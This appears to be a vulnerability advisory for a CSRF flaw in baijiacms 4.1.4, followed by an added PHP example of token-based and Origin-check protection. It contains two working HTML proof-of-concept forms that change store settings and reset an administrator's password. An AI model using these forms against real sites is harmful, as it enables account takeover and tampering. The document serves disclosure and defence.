CVE-2021-33396: There is a CSRF vulnerability · Issue #7 · baijiacms/baijiacmsV4

Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php.

Category: CVE
Tags: csrf, vulnerability, web, php

Vulnerability description

A CSRF vulnerability was discovered in baijiacmsV4.
The affected forms carry no anti-CSRF token and the server does not check request provenance, so once an administrator is logged in, opening either of the following two pages lets an attacker modify the store information or the administrator's login password.
1. Modify the store information.
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="sname" value="xxx" />
      <input type="hidden" name="website" value="xxx" />
      <input type="hidden" name="fullwebsite" value="http&#58;&#47;&#47;xxx&#47;" />
      <input type="hidden" name="status" value="1&apos;" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;index&#46;php" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;admin&#46;php" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Original store information

When a logged-in administrator opens the malicious web page and clicks the button

the store information has been changed.

2. Modify the login password.
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="newpassword" value="111111" />
      <input type="hidden" name="confirmpassword" value="111111" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When a logged-in administrator opens the malicious web page and clicks the button,

the administrator's login password is changed to 111111.
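Both PoCs work for the same reason: the `store` and `changepwd` handlers accept any POST that arrives with the administrator's session cookie, with nothing that ties the request to a form the application itself rendered. The following is an added example (not baijiacms code and not the reporter's) of the fix a maintainer would apply to such handlers: a per-session synchronizer token embedded in every form and verified with a constant-time comparison, plus an Origin/Referer host check as a second layer. The `$session`, `$request` and `$users` arrays, the handler name `handle_changepwd`, and the host `10.0.0.128` taken from the PoC forms are assumptions made for the demonstration; in a real deployment `$session` is `$_SESSION` and `$request` is assembled from `$_SERVER` and `$_POST`.

```php
<?php
// Added example: synchronizer-token CSRF protection for a state-changing
// handler such as the changepwd / store endpoints in the advisory above.
// Not baijiacms code; session and request are modelled as plain arrays.
declare(strict_types=1);

const CSRF_TOKEN_KEY = 'csrf_token';

/** Issue (or reuse) a per-session token; call this when rendering a form. */
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_TOKEN_KEY])) {
        $session[CSRF_TOKEN_KEY] = bin2hex(random_bytes(32)); // 256 bits, CSPRNG
    }
    return $session[CSRF_TOKEN_KEY];
}

/** Hidden input to embed in every POST form the application renders. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="' . CSRF_TOKEN_KEY . '" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '" />';
}

/**
 * Returns true only if the request is a POST, its Origin (or Referer when
 * Origin is absent) names our own host, and the submitted token equals the
 * session token. A forged cross-site form fails the Origin check and, having
 * no way to read the victim's session token, fails the token check too.
 */
function csrf_request_allowed(array $session, array $request, string $ownHost): bool
{
    if (($request['method'] ?? '') !== 'POST') {
        return false;
    }
    $origin = $request['headers']['Origin'] ?? $request['headers']['Referer'] ?? null;
    if ($origin === null) {
        return false; // no provenance at all: reject rather than guess
    }
    $host = parse_url($origin, PHP_URL_HOST);
    if (!is_string($host) || strcasecmp($host, $ownHost) !== 0) {
        return false;
    }
    $expected = $session[CSRF_TOKEN_KEY] ?? '';
    $given    = $request['post'][CSRF_TOKEN_KEY] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given); // constant-time comparison
}

/** Hypothetical changepwd handler with the CSRF check in front of the state change. */
function handle_changepwd(array &$session, array $request, string $ownHost, array &$users): string
{
    if (!csrf_request_allowed($session, $request, $ownHost)) {
        return '403 CSRF check failed';
    }
    $user = $request['post']['username'] ?? '';
    $new  = $request['post']['newpassword'] ?? '';
    if ($new === '' || $new !== ($request['post']['confirmpassword'] ?? null)) {
        return '400 password mismatch';
    }
    $users[$user] = password_hash($new, PASSWORD_DEFAULT);
    return '200 password changed';
}

// --- Demonstration with constructed requests ---------------------------------
$ownHost = '10.0.0.128';   // host used in the PoC forms
$session = [];             // stands in for $_SESSION of the logged-in admin
$users   = ['admin' => password_hash('original', PASSWORD_DEFAULT)];

// Request shaped like the PoC: cross-origin POST carrying no token.
$forged = [
    'method'  => 'POST',
    'headers' => ['Origin' => 'http://attacker.example'],
    'post'    => ['username' => 'admin', 'newpassword' => '111111', 'confirmpassword' => '111111'],
];
echo handle_changepwd($session, $forged, $ownHost, $users), PHP_EOL;

// Same-site form rendered by the application, carrying the session token.
$token = csrf_token($session);
$legit = [
    'method'  => 'POST',
    'headers' => ['Origin' => 'http://10.0.0.128'],
    'post'    => ['username' => 'admin', 'newpassword' => 'N3w-Pass',
                  'confirmpassword' => 'N3w-Pass', CSRF_TOKEN_KEY => $token],
];
echo handle_changepwd($session, $legit, $ownHost, $users), PHP_EOL;
echo csrf_field($session), PHP_EOL; // what the rendered form would contain
```

The token check alone is sufficient against this class of attack; the Origin check is kept because it also rejects the request before any token lookup and produces a log-worthy signal (a POST to a password-change endpoint from a foreign origin) that a defender can alert on. Setting the session cookie with `SameSite=Lax` or `Strict` adds a third, browser-enforced layer.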
